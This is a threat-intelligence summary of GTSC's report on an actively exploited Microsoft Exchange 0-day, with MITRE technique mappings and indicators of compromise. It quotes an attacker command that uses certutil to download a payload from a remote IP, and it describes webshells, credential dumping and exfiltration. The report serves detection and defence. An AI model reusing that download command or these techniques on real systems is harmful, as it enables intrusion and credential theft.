GTSC’s security team documented a 0-day remote code execution vulnerability in Microsoft Exchange being actively exploited in August 2022, leading to webshell deployment, credential dumping, and lateral movement. They provided a temporary, community-focused remediation (URL rewrite rule to block autodiscover usage) while awaiting an official patch, and released scanning tools to help defenders detect exploitation. hashtags: #MicrosoftExchange #Antsword #ProxyShell #Chopper #GTSC #Autodiscover
Keypoints
- GTSC detected a 0-day Exchange vulnerability being exploited to achieve remote code execution on multiple targets.
- Attackers dropped web shells on Exchange servers, with obfuscated payloads and use of Antsword for webshell management.
- Files such as RedirSuiteServiceProxy.aspx were modified to host webshell content; suspicious files appeared across various paths.
- Command execution involved Windows commands via certutil to fetch payloads, with a distinctive end-signature linked to the Chinese Chopper group.
- Credential dumping occurred via dropped components (e.g., all.exe and dump.dll), with data compressed and exfiltrated using rar.exe.
- DLL-based malware with Run/m classes listened on port 443 and communicated with a fixed C2 address, using RC4 for C2 traffic.
- GTSC recommended immediate mitigation via IIS URL Rewrite to block suspected autodiscover activity and released a scanning tool for IIS logs.
MITRE Techniques
- [T1505.003] Server Software Component: Web Shell – Webshells, mostly obfuscated, were dropped to Exchange servers. Quote: “We detected webshells, mostly obfuscated, being dropped to Exchange servers.”
- [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Attacker commands executed via cmd, including:
“cmd” /c cd /d “c:PerfLogs”&certutil.exe -urlcache -split -f http://206.188.196.77:8080/themes.aspx c:perflogst&echo [S]&cd&echo [E] - [T1047] Windows Management Instrumentation – Execution included WMIC usage to run dropped files. Quote: “and executes these files through WMIC.”
- [T1036.005] Masquerading: Masquerading: Match Legitimate Name or Location – RedirSuiteServiceProxy.aspx was modified to contain webshell content while appearing as a legitimate file. Quote: “the hacker also changes the content of the file RedirSuiteServiceProxy.aspx to webshell content.”
- [T1620] Reflective Code Loading – DLL loads and executes C# bytecode received from requests. Quote: “Load and execute C# bytecode received from request.”
- [T1003.001] OS Credential Dumping: LSASS Memory – Credential dumping performed via dropped files (e.g., all.exe and dump.dll). Quote: “all.exe and dump.dll are responsible for credentials dumping on the server system.”
- [T1083] File and Directory Discovery – Listing directory and file information. Quote: “Case 3: Call to method ld, which is responsible for listing directory and file information in the format.”
- [T1049] System Network Connections Discovery – Checking connections and C2 activity via networked commands (certutil usage and C2). Quote: “checks connections through certutil, which is a legitimate tool available in the Windows environment.”
- [T1570] Lateral Tool Transfer – Lateral movements to other servers within the system. Quote: “Lateral movements to other servers in the system.”
- [T1560.001] Archive Collected Data: Archive via Utility – Dumped data compressed with rar.exe and copied to webroot. Quote: “rar.exe to compress dumped files and copy them to the webroot of the Exchange server.”
Indicators of Compromise
- [IP] – 125.212.220.48, 5.180.61.17, and other listed IPs connected to C2/command infrastructure
- [URL] – http://206.188.196.77:8080/themes.aspx, and other resource URLs used to fetch payloads
- [C2] – 137.184.67.33
- [FileName] – RedirSuiteServiceProxy.aspx, Xml.ashx, pxh4HG1v.ashx, errorEE.aspx, Dll.dll, 180000000.dll
- [FileHash] – be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257; 074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82; 65a002fe655dc1751add167cf00adf284c080ab2e97cd386881518d3a31d27f5
- [Path] – C:Program FilesMicrosoft Exchange Server V15FrontEndHttpProxyowaauth, C:inetpubwwwrootaspnet_client, C:rootDrSDKCaller.exe, C:UsersPublicall.exe
- [URL] – hxxp://206.188.196.77:8080/themes.aspx, https://httpbin.org/get
- [C2] – 137.184.67.33 (C2 server address used by the DLL)